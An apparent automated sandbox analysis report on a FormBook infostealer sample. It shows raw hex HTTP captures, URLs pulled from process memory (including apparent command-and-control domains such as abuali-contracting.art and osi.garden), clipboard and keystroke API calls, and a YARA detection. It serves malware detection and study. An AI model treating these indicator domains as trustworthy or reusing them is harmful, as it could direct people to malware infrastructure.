b6 24 7c 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 05 Nov 2024 14:39:04 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f 82 28 08 eb 07 08 fb 4e e2 34 35 c6 48 9c 79 3f 6a ef b8 71 50 0e 3a dc bb 79 92 97 0f d0 df fb 97 f6 7e d8 2b 0d 9f 12 38 81 be a7 15 8e e7 45 59 f0 00 dd f4 a7 4e 19 44 d9 bb ee ff f8 29 7e 05 dc 3a ca b3 6f 90 9f e7 35 28 6f ec e1 45 55 91 38 a7 07 68 9f e4 6e fc 7f c0 ee fb 10 7f 4e 94 7d e0 f4 2c e4 7d 02 fc fa 01 72 9a 3a 7f cf ec 85 5c 3e 5b f1 23 fd 4d 77 08 43 af 3d f0 a6 e9 f7 12 54 45 9e 55 e0 3e ca fc fc 46 d1 57 bb f2 97 f6 c6 fb 6a 7a 55 3b 75 53 dd bb b9 07 6e 26 5f a2 e6 d9 fd 14 8a fe c3 1f cd 2e 81 53 e5 d9 d7 f3 71 ea 7a fe 10 92 5f b9 e0 4a b2 8b 4d dd fa a2 d7 b7 9f 9e fd fe cc eb 7e 28 14 37 0c 5f b5 45 2f ed 53 79 87 58 1a 02 c3 49 3e 33 d7 55 b4 96 a0 00 4e fd 00 65 f9 fd f3 cf 37 b8 41 fc ab 91 af 5c 71 86 60 49 f6 fd b0 57 da f4 d2 de 68 57 5a de 4a e4 7c a1 d4 9f 87 b8 8f 6a 90 56 37 30 3f 23 09 47 8b fe 43 2a 45 d9 5b 2a 33 c4 17 81 76 ed 8f 1b f4 97 38 de e7 75 9d a7 0f d0 c0 e3 4d d9 9f 15 e8 a5 94 8c ae 89 57 96 78 87 7f 6b 86 c1 dd f7 1e 70 f3 d2 19 fc f7 00 35 99 07 ca a1 08 bd 67 f4 6a 71 12 a7 39 fe ca 1b 5f f2 79 08 f3 16 94 57 f1 f5 5e 8c 07 3f 77 9b ea 6b b2 e3 d6 51 7b 9b 39 af 42 e0 ec 88 64 46 6f 02 5e 09 f1 75 14 bf d6 b5 cf 1c 75 95 92 d8 17 66 6c 92 1b df fc cc b4 28 bb d4 ec 4f 6a 5e 12 55 f5 fd 65 59 19 02 3e 03 50 de d4 55 e4 81 cb cb 9b f8 83 23 5f a5 bb 29 c6 3f c3 eb aa ff 4d db 26 81 92 e8 46 2c 3f c9 87 fc 1a 2a e3 7b 0e 17 4f 3b 49 14 64 0f 90 0b b2 1a 94 6f f4 37 c8 ef 37 79 f3 12 f4 9f 71 ba 2c b8 0f 10 f6 55 0d 1b ea e6 7d 94 3a c1 ad 1b 7f 2a f5 65 ed bd 4c 1d 76 39 51 16 dc ea 37 ac b9 dd cb fa b8 cf 13 ef 4d 8b c1 8e d7 5a 7e b4 41 97 97 de fd be 04 4e fc 00 5d 1e f7 4e 92 bc 07 f8 53 5a 55 a0 6c 41 09 39 9e 57 82 ea b6 24 7c 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Tue, 05 Nov 2024 14:39:07 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 36 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005D06000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005DC6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://abuali-contracting.art/ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.00000000061BC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000627C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000006804000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.00000000068C4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
            Source: BlltrVxNMs.exe, 00000002.00000002.9380185277.0000000001607000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.osi.garden
            Source: BlltrVxNMs.exe, 00000002.00000002.9380185277.0000000001607000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.osi.garden/gqtu/
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000006B28000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000006BE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000006672000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000006732000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lso83ossf5u2arbuqd8p.png
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dev-to.s3.us-east-2.amazonaws.com/favicon.ico
            Source: -f1ZI14.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: -f1ZI14.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://gcdnb.pbrd.co/images/Gegd7gc1KW00.jpg?o=1);background-size:
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://gcdnb.pbrd.co/images/qYol8RtBBg8K.jpg?o=1
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: msiexec.exe, 00000003.00000003.4989236920.0000000003356000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4994416168.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989398688.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4992897675.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.0000000003372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: msiexec.exe, 00000003.00000003.4989236920.0000000003356000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4994416168.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989398688.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4992897675.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.0000000003372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: msiexec.exe, 00000003.00000003.4989236920.0000000003356000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4994416168.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4989398688.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4992897675.0000000003372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.0000000003372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: msiexec.exe, 00000003.00000002.8169483298.0000000003312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
            Source: msiexec.exe, 00000003.00000002.8169483298.0000000003312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
            Source: msiexec.exe, 00000003.00000003.4988294934.0000000008206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
            Source: firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--2ecYCSjC--/c_limit
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--E8ak4Hr1--/c_limit
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--KfIJiWl4--/c_imagga_scale
            Source: firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--gDM0_LTS--/c_limit
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--l0c3Kmql--/c_limit
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--lrmEcD2H--/c_limit
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/practicaldev/image/fetch/s--t7tVouP9--/c_limit
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://unpkg.com/flickity
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: msiexec.exe, 00000003.00000003.4999748750.0000000008296000.00000004.00000020.00020000.00000000.sdmp, -f1ZI14.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-73FPR0H3RW
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-DYHRKHR3DQ
            Source: firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/amp
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/favicon.ico
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/feed/rss
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/js/global.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/sitemap.xml
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/custom.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/font.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/style_v3.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/css/styleslot.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/genericons/genericons.css
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/functions.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/jquery-migrate.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/jquery.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/rtp/js/skip-link-focus-fix.js
            Source: BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.nagasl89.baby/themes/twentyfifteen/js/html5.js
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
